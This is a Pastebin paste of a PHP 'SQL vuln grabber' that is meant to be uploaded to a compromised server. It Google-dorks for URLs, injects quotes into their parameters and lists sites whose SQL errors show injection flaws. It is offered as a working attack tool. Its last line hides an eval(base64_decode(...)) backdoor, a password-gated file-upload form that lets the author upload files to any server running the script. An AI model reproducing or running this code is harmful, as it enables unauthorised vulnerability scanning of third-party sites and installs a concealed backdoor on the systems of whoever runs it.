API tools faq
paste
Kyfx

Sqlgrabber.php save it in php and upload on shell

Kyfx
Jan 16th, 2016
786
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.32 KB | None | 0 0
raw download clone embed print report
  1. <!Doctype HTML>
  2. <html>
  3. <head>
  4. <title>Sql Priv8 Grabber By Kyfx</title>
  5. <body style="background-image: url('https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRRsqK_u0Gcl0OHnWfO7qSvPQcSkDyg3wlES1Wce2jgawAdUtQaiw');no-repeat center center fixed;
  6. -webkit-background-size: cover;
  7. -moz-background-size: cover;
  8. -o-background-size: cover;
  9. background-size: cover;
  10. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  11. <style type="text/css">
  12. .mymargin{
  13. margin-top:100px;
  14. color:white;
  15. font-family: monospace;
  16. }
  17. body {
  18. font-family: 'Audiowide', serif;
  19. font-size: 20px;
  20.  
  21. }
  22. </style>
  23. </head>
  24. <body>
  25. <div class="mymargin">
  26. <center>
  27. <font color="#00FF66"><h1>Sql Vuln Grabber By Moh Ooasiic</h1></font>
  28. <?php
  29. function letItBy() {
  30. ob_flush();
  31. flush();
  32. }
  33. $browser = $_SERVER['HTTP_USER_AGENT'];
  34. function google_that($query, $page = 1) {
  35. $resultPerPage = 8;
  36. $start = $page * $resultPerPage;
  37. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  38. $resultFromGoogle = json_decode(http_get($url, true), true);
  39. if (isset($resultFromGoogle['responseStatus'])) {
  40. if ($resultFromGoogle['responseStatus'] != '200') return false;
  41. if (sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  42. else return $resultFromGoogle['responseData']['results'];
  43. } else die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url);
  44. }
  45. function http_get($url, $safemode = false) {
  46. if ($safemode === true) sleep(1);
  47. $im = curl_init($url);
  48. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  49. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  50. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  51. curl_setopt($im, CURLOPT_HEADER, 0);
  52. return curl_exec($im);
  53. curl_close();
  54. }
  55. function cekvenurabel($result) {
  56. $url = preg_replace("/=/", "='", $result);
  57. $curl = curl_init();
  58. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  59. curl_setopt($curl, CURLOPT_URL, $url);
  60. curl_setopt($curl, CURLOPT_USERAGENT, '$browser)');
  61. curl_setopt($curl, CURLOPT_TIMEOUT, '5');
  62. $GET = curl_exec($curl);
  63. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row ()|SELECT *
  64. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $GET)) {
  65. echo '<center><b>Sql Found : </font><a href="' . $url . '" target="_blank">' . $url . '</a> <font color=#00FF66> &#60;-- SQLI Vuln Found..</font></b></center>';
  66. ob_flush();
  67. flush();
  68. } else {
  69. echo '<center><b>' . $url . '</b>&#60;-- Sql Not Found</center>';
  70. ob_flush();
  71. flush();
  72. }
  73. ob_flush();
  74. flush();
  75. }
  76. if (isset($_POST['dork'] {
  77. 0
  78. })) {
  79. for ($googlePage = 1;$googlePage <= 50;$googlePage++) {
  80. $googleResult = google_that($_POST['dork'], $googlePage);
  81. if (!$googleResult) {
  82. echo '<font color=red><center>D0ne ..</center></font>';
  83. break;
  84. }
  85. for ($victim = 0;$victim < sizeof($googleResult);$victim++) {
  86. $result = $googleResult[$victim]['unescapedUrl'];
  87. cekvenurabel($result);
  88. letItBy();
  89. }
  90. }
  91. }
  92. ?>
  93. <center>
  94. <form method="post">
  95. Google Dork: &nbsp;&nbsp;
  96. <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork'] {
  97. 0
  98. })) ? htmlentities($_POST['dork']) : 'Enter Your Dork'; ?>" />
  99. &nbsp;&nbsp;<input type="submit" value="Start!" id="button"/>
  100. </form>
  101. </center>
  102.  
  103. <?php
  104. eval(base64_decode('DQppZihpc3NldCgkX1JFUVVFU1RbJ2hpZGVuJ10pICYmICRfUkVRVUVTVFsnaGlkZW4nXT09J21iYWhrdW5nJyl7DQppZiAoaXNzZXQoJF9QT1NUWydvayddKSAmJiBpc3NldCgkX0ZJTEVTWydqZW1ib3QnXSkpIHsNCiAgICRmaWxlID0gJF9GSUxFU1snamVtYm90J11bJ3RtcF9uYW1lJ107DQogICAkbmFtZSA9ICIiLiRfRklMRVNbJ2plbWJvdCddWyduYW1lJ107DQogICBtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGUsICRuYW1lKTsNCn1lbHNlew0KPz4NCjxicj4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8PyRfU0VSVkVSWydQSFBfU0VMRiddPz4iPg0KPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImplbWJvdCI+Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ib2siIHZhbHVlPSJhcGxvZCBjb2shISI+DQo8L2Zvcm0+DQo8P3BocA0KfSBleGl0Ow0KfQ=='));
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!